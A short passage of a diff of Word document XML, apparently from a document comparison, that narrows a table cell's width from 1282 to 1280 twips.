             <w:tcBorders/>
           </w:tcPr>
@@ -4255,7 +4055,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1282" w:type="dxa"/>
+            <w:tcW w:w="1280" w:type="dxa"/>
             <w:tcBorders/>
           </w:tcPr>
           <w:p>

</xml_diff>